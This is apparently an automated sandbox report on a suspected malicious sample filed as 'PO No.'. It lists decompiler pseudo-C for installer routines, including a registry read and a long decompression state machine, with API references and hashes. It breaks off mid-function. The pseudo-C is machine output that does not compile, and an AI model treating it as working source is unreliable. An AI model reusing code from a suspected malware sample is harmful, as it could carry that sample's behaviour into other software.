                                                                      0x004053e7
                                                                      0x004053e8
                                                                      0x004053ea
                                                                      0x004053f0
                                                                      0x004053f0
                                                                      0x004053fa
                                                                      0x00405408
                                                                      0x00000000
                                                                      0x00405408
                                                                      0x004053bf
                                                                      0x004053f7
                                                                      0x004053f7
                                                                      0x00000000
                                                                      0x004053f7
                                                                      0x004053cb
                                                                      0x004053cd
                                                                      0x00000000
                                                                      0x004053cd
                                                                      0x0040539c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004053a3
                                                                      0x00000000

                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 004053B7
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405408
                                                                        • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                      • Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
                                                                      • Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                      • Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E0040627E(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                      				int _v8;
                                                                      				long _t21;
                                                                      				long _t24;
                                                                      				char* _t30;
                                                                      
                                                                      				asm("sbb eax, eax");
                                                                      				_v8 = 0x800;
                                                                      				_t21 = E0040621D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                      				_t30 = _a16;
                                                                      				if(_t21 != 0) {
                                                                      					L4:
                                                                      					 *_t30 =  *_t30 & 0x00000000;
                                                                      				} else {
                                                                      					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                                      					_t21 = RegCloseKey(_a20); // executed
                                                                      					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                      						goto L4;
                                                                      					}
                                                                      				}
                                                                      				return _t21;
                                                                      			}







                                                                      0x0040628c
                                                                      0x0040628e
                                                                      0x004062a6
                                                                      0x004062ab
                                                                      0x004062b0
                                                                      0x004062ee
                                                                      0x004062ee
                                                                      0x004062b2
                                                                      0x004062c4
                                                                      0x004062cf
                                                                      0x004062d5
                                                                      0x004062e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062e0
                                                                      0x004062f4

                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,004064F2,80000002), ref: 004062C4
                                                                      • RegCloseKey.KERNELBASE(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 004062CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID: Call
                                                                      • API String ID: 3356406503-1824292864
                                                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                      • Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
                                                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                      • Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 99%
                                                                      			E00406EEF() {
                                                                      				signed int _t530;
                                                                      				void _t537;
                                                                      				signed int _t538;
                                                                      				signed int _t539;
                                                                      				unsigned short _t569;
                                                                      				signed int _t579;
                                                                      				signed int _t607;
                                                                      				void* _t627;
                                                                      				signed int _t628;
                                                                      				signed int _t635;
                                                                      				signed int* _t643;
                                                                      				void* _t644;
                                                                      
                                                                      				L0:
                                                                      				while(1) {
                                                                      					L0:
                                                                      					_t530 =  *(_t644 - 0x30);
                                                                      					if(_t530 >= 4) {
                                                                      					}
                                                                      					 *(_t644 - 0x40) = 6;
                                                                      					 *(_t644 - 0x7c) = 0x19;
                                                                      					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                      					while(1) {
                                                                      						L145:
                                                                      						 *(_t644 - 0x50) = 1;
                                                                      						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                      						while(1) {
                                                                      							L149:
                                                                      							if( *(_t644 - 0x48) <= 0) {
                                                                      								goto L155;
                                                                      							}
                                                                      							L150:
                                                                      							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                      							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                      							 *(_t644 - 0x54) = _t643;
                                                                      							_t569 =  *_t643;
                                                                      							_t635 = _t569 & 0x0000ffff;
                                                                      							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                      							if( *(_t644 - 0xc) >= _t607) {
                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                      								_t628 = _t627 + 1;
                                                                      								 *_t643 = _t569 - (_t569 >> 5);
                                                                      								 *(_t644 - 0x50) = _t628;
                                                                      							} else {
                                                                      								 *(_t644 - 0x10) = _t607;
                                                                      								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                      								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                      							}
                                                                      							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                      								L148:
                                                                      								_t487 = _t644 - 0x48;
                                                                      								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                      								L149:
                                                                      								if( *(_t644 - 0x48) <= 0) {
                                                                      									goto L155;
                                                                      								}
                                                                      								goto L150;
                                                                      							} else {
                                                                      								L154:
                                                                      								L146:
                                                                      								if( *(_t644 - 0x6c) == 0) {
                                                                      									L169:
                                                                      									 *(_t644 - 0x88) = 0x18;
                                                                      									L170:
                                                                      									_t579 = 0x22;
                                                                      									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                      									_t539 = 0;
                                                                      									L172:
                                                                      									return _t539;
                                                                      								}
                                                                      								L147:
                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                      								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                      								_t484 = _t644 - 0x70;
                                                                      								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                      								goto L148;
                                                                      							}
                                                                      							L155:
                                                                      							_t537 =  *(_t644 - 0x7c);
                                                                      							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                      							while(1) {
                                                                      								L140:
                                                                      								 *(_t644 - 0x88) = _t537;
                                                                      								while(1) {
                                                                      									L1:
                                                                      									_t538 =  *(_t644 - 0x88);
                                                                      									if(_t538 > 0x1c) {
                                                                      										break;
                                                                      									}
                                                                      									L2:
                                                                      									switch( *((intOrPtr*)(_t538 * 4 +  &M0040735D))) {
                                                                      										case 0:
                                                                      											L3:
                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                      												goto L170;
                                                                      											}
                                                                      											L4:
                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                      											_t538 =  *( *(_t644 - 0x70));
                                                                      											if(_t538 > 0xe1) {
                                                                      												goto L171;
                                                                      											}
                                                                      											L5:
                                                                      											_t542 = _t538 & 0x000000ff;
                                                                      											_push(0x2d);
                                                                      											asm("cdq");
                                                                      											_pop(_t581);
                                                                      											_push(9);
                                                                      											_pop(_t582);
                                                                      											_t638 = _t542 / _t581;
                                                                      											_t544 = _t542 % _t581 & 0x000000ff;
                                                                      											asm("cdq");
                                                                      											_t633 = _t544 % _t582 & 0x000000ff;
                                                                      											 *(_t644 - 0x3c) = _t633;
                                                                      											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                      											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                      											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                      											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                      												L10:
                                                                      												if(_t641 == 0) {
                                                                      													L12:
                                                                      													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                      													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                      													goto L15;
                                                                      												} else {
                                                                      													goto L11;
                                                                      												}
                                                                      												do {
                                                                      													L11:
                                                                      													_t641 = _t641 - 1;
                                                                      													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                      												} while (_t641 != 0);
                                                                      												goto L12;
                                                                      											}
                                                                      											L6:
                                                                      											if( *(_t644 - 4) != 0) {
                                                                      												GlobalFree( *(_t644 - 4));
                                                                      											}
                                                                      											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                      											 *(_t644 - 4) = _t538;
                                                                      											if(_t538 == 0) {
                                                                      												goto L171;
                                                                      											} else {
                                                                      												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                      												goto L10;
                                                                      											}
                                                                      										case 1:
                                                                      											L13:
                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                      												L157:
                                                                      												 *(_t644 - 0x88) = 1;
                                                                      												goto L170;
                                                                      											}
                                                                      											L14:
                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                      											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                      											_t45 = _t644 - 0x48;
                                                                      											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                      											__eflags =  *_t45;
                                                                      											L15:
                                                                      											if( *(_t644 - 0x48) < 4) {
                                                                      												goto L13;
                                                                      											}
                                                                      											L16:
                                                                      											_t550 =  *(_t644 - 0x40);
                                                                      											if(_t550 ==  *(_t644 - 0x74)) {
                                                                      												L20:
                                                                      												 *(_t644 - 0x48) = 5;
                                                                      												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                      												goto L23;
                                                                      											}
                                                                      											L17:
                                                                      											 *(_t644 - 0x74) = _t550;
                                                                      											if( *(_t644 - 8) != 0) {
                                                                      												GlobalFree( *(_t644 - 8));
                                                                      											}
                                                                      											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                      											 *(_t644 - 8) = _t538;
                                                                      											if(_t538 == 0) {
                                                                      												goto L171;
                                                                      											} else {
                                                                      												goto L20;
                                                                      											}
                                                                      										case 2:
                                                                      											L24:
                                                                      											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                      											 *(_t644 - 0x84) = 6;
                                                                      											 *(_t644 - 0x4c) = _t557;
                                                                      											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                      											goto L132;
                                                                      										case 3:
                                                                      											L21:
                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                      												L158:
                                                                      												 *(_t644 - 0x88) = 3;
                                                                      												goto L170;
                                                                      											}
                                                                      											L22:
                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                      											_t67 = _t644 - 0x70;
                                                                      											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                      											__eflags =  *_t67;
                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                      											L23:
                                                                      											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                      											if( *(_t644 - 0x48) != 0) {
                                                                      												goto L21;
                                                                      											}
                                                                      											goto L24;
                                                                      										case 4:
                                                                      											L133:
                                                                      											_t559 =  *_t642;
                                                                      											_t626 = _t559 & 0x0000ffff;
                                                                      											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                      											if( *(_t644 - 0xc) >= _t596) {
                                                                      												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                      												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                      												 *(_t644 - 0x40) = 1;
                                                                      												_t560 = _t559 - (_t559 >> 5);
                                                                      												__eflags = _t560;
                                                                      												 *_t642 = _t560;
                                                                      											} else {
                                                                      												 *(_t644 - 0x10) = _t596;
                                                                      												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                      												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                      											}
                                                                      											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                      												goto L139;
                                                                      											} else {
                                                                      												goto L137;
                                                                      											}
                                                                      										case 5:
                                                                      											L137:
                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                      												L168:
                                                                      												 *(_t644 - 0x88) = 5;
                                                                      												goto L170;
                                                                      											}
                                                                      											L138:
                                                                      											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                      											L139:
                                                                      											_t537 =  *(_t644 - 0x84);
                                                                      											L140:
                                                                      											 *(_t644 - 0x88) = _t537;
                                                                      											goto L1;
                                                                      										case 6:
                                                                      											L25:
                                                                      											__edx = 0;
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												L36:
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x34) = 1;
                                                                      												 *(__ebp - 0x84) = 7;
                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                      												goto L132;
                                                                      											}
                                                                      											L26:
                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                      											__esi =  *(__ebp - 0x60);
                                                                      											__cl = 8;
                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                      											__ecx =  *(__ebp - 4);
                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                      													_t98 = __ebp - 0x38;
                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                      													__eflags =  *_t98;
                                                                      												} else {
                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                      												}
                                                                      											} else {
                                                                      												 *(__ebp - 0x38) = 0;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                      												L35:
                                                                      												__ebx = 0;
                                                                      												__ebx = 1;
                                                                      												goto L61;
                                                                      											} else {
                                                                      												L32:
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                      													__eflags = __eax;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 8);
                                                                      												__ebx = 0;
                                                                      												__ebx = 1;
                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                      												goto L41;
                                                                      											}
                                                                      										case 7:
                                                                      											L66:
                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                      												L68:
                                                                      												__eax =  *(__ebp - 0x24);
                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      												__eax =  *(__ebp - 0x28);
                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      												__eax =  *(__ebp - 0x2c);
                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      												__eax = 0;
                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      												__al = __al & 0x000000fd;
                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                      												__eflags = __eax;
                                                                      												 *(__ebp - 0x58) = __eax;
                                                                      												goto L69;
                                                                      											}
                                                                      											L67:
                                                                      											__eax =  *(__ebp - 4);
                                                                      											__ecx =  *(__ebp - 0x38);
                                                                      											 *(__ebp - 0x84) = 8;
                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                      											goto L132;
                                                                      										case 8:
                                                                      											L70:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                      											} else {
                                                                      												__eax =  *(__ebp - 0x38);
                                                                      												__ecx =  *(__ebp - 4);
                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                      												 *(__ebp - 0x84) = 9;
                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                      											}
                                                                      											goto L132;
                                                                      										case 9:
                                                                      											L73:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												goto L90;
                                                                      											}
                                                                      											L74:
                                                                      											__eflags =  *(__ebp - 0x60);
                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                      												goto L171;
                                                                      											}
                                                                      											L75:
                                                                      											__eax = 0;
                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                      											__eflags = _t259;
                                                                      											0 | _t259 = _t259 + _t259 + 9;
                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                      											goto L76;
                                                                      										case 0xa:
                                                                      											L82:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												L84:
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                      												goto L132;
                                                                      											}
                                                                      											L83:
                                                                      											__eax =  *(__ebp - 0x28);
                                                                      											goto L89;
                                                                      										case 0xb:
                                                                      											L85:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__ecx =  *(__ebp - 0x24);
                                                                      												__eax =  *(__ebp - 0x20);
                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      											} else {
                                                                      												__eax =  *(__ebp - 0x24);
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x28);
                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      											L89:
                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      											L90:
                                                                      											__eax =  *(__ebp - 4);
                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                      											goto L69;
                                                                      										case 0xc:
                                                                      											L99:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												L164:
                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                      												goto L170;
                                                                      											}
                                                                      											L100:
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t334 = __ebp - 0x70;
                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t334;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											__eax =  *(__ebp - 0x2c);
                                                                      											goto L101;
                                                                      										case 0xd:
                                                                      											L37:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												L159:
                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                      												goto L170;
                                                                      											}
                                                                      											L38:
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t122 = __ebp - 0x70;
                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t122;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											L39:
                                                                      											__eax =  *(__ebp - 0x40);
                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                      												goto L48;
                                                                      											}
                                                                      											L40:
                                                                      											__eflags = __ebx - 0x100;
                                                                      											if(__ebx >= 0x100) {
                                                                      												goto L54;
                                                                      											}
                                                                      											L41:
                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                      											__ecx =  *(__ebp - 0x58);
                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                      											 *(__ebp - 0x48) = __eax;
                                                                      											__eax = __eax + 1;
                                                                      											__eax = __eax << 8;
                                                                      											__eax = __eax + __ebx;
                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      											__ax =  *__esi;
                                                                      											 *(__ebp - 0x54) = __esi;
                                                                      											__edx = __ax & 0x0000ffff;
                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      												__cx = __ax;
                                                                      												 *(__ebp - 0x40) = 1;
                                                                      												__cx = __ax >> 5;
                                                                      												__eflags = __eax;
                                                                      												__ebx = __ebx + __ebx + 1;
                                                                      												 *__esi = __ax;
                                                                      											} else {
                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                      												0x800 = 0x800 - __edx;
                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                      												__ebx = __ebx + __ebx;
                                                                      												 *__esi = __cx;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      												goto L39;
                                                                      											} else {
                                                                      												L45:
                                                                      												goto L37;
